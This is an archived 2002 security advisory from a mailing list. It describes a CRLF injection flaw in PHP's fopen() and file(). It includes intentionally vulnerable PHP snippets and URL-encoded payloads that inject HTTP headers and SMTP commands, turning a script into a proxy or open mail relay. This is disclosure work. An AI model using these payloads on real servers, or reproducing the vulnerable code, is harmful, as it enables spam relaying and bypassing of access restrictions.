[UNIX] PHP fopen() CRLF Injection
From: support@securiteam.comDate: 09/11/02
- Previous message: support@securiteam.com: "[NT] WebServer 4 Everyone Directory Traversal Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 11 Sep 2002 17:07:07 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PHP fopen() CRLF Injection
------------------------------------------------------------------------
SUMMARY
PHP is a widely used Open Source general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML.
Its syntax draws upon C, Java, and Perl, and is easy to learn. PHP runs on
many different platforms and can be used as a standalone executable or as
a module under a variety of Web servers. It has excellent support for
databases, XML, LDAP, IMAP, Java, various Internet protocols, and general
data manipulation, and is extensible via its powerful API.
fopen(), file() and other functions in PHP have a vulnerability that makes
it possible to add extra HTTP headers to HTTP queries. Attackers may use
it to escape certain restrictions, like what host to access on a web
server. In some cases, this vulnerability even opens up for arbitrary net
connections, turning some PHP scripts into proxies and open mail relays.
DETAILS
Vulnerable systems:
* PHP versions 4.1.2, 4.2.2, 4.2.3, latest CVS, possibly others
PHP has several functions that take filenames as one of their arguments:
fopen(), file() and some others. If allow_url_fopen is set to On in
php.ini, those functions also accept URLs instead of regular files, and
they connect to the server in question with the correct protocol. This
functionality is vulnerable to some CRLF Injection attacks.
1) We start with the simple attacks. Let us say that this PHP snippet is
saved as snippet.php:
<?php
echo '<pre>';
print_r(file("http://www.site1.st/api?sunnan=$sunnan&vind=$vind"));
echo '</pre>';
?>
If an attacker surfs to:
snippet.php?sunnan=visby&vind=gotland%20HTTP/1.0%0D%0AHost%3A%20www.
site2.st%0D%0AUser-Agent%3A%20Ulf/0.0%0D%0AReferer%3A%20http%3A%2F
%2Fwww.gnuheter.org%2F%0D%0ACookie%3A%20user%3Dulf%0D%0A%0D%0A
(should be on one line)
This HTTP query will be sent to www.site1.st:
GET /api?sunnan=visby&vind=gotland HTTP/1.0
Host: www.site2.st
User-Agent: Ulf/0.0
Referer: http://www.gnuheter.org/
Cookie: user=ulf
HTTP/1.0
Host: www.site1.st
User-Agent: PHP/4.1.2
As you can see, the real headers from PHP are sent as well, but the web
server ignores them, as we send two CRLFs before them to indicate that the
headers are over.
Using this technique, we can add arbitrary user agents, referrers, and
cookies. We can also break out of restrictions and access site2.st instead
of the site site1.st that snippet.php tries to restrict us to, if site1.st
and site2.st are virtual hosts on the same machine.
2) If the PHP script is even worse, like this one called dotcom.php:
<?php
$fp = fopen($url, 'r');
fpassthru($fp);
?>
We can connect to arbitrary ports and send (almost) arbitrary commands,
thus turning the dotcom.php script into a proxy and an open mail relay.
If we surf to:
dotcom.php?url=http%3A%2F%2Fmail.site1.st%3A25%2F+HTTP/1.0%0D%0AHELO+
my.own.machine%0D%0AMAIL+FROM%3A%3Cme%40my.own.machine%3E%0D%0ARCPT+
TO%3A%3Cinfo%40site1.st%3E%0D%0ADATA%0D%0Ai+will+never+say+the+word+
PROCRASTINATE+again%0D%0A.%0D%0AQUIT%0D%0A%0D%0A
(should be on one line)
The PHP interpreter will connect to mail.site1.st on port 25, and send the
following commands:
GET / HTTP/1.0
HELO my.own.machine
MAIL FROM:<me@my.own.machine>
RCPT TO:<info@site1.st>
DATA
i will never say the word PROCRASTINATE again
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] WebServer 4 Everyone Directory Traversal Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
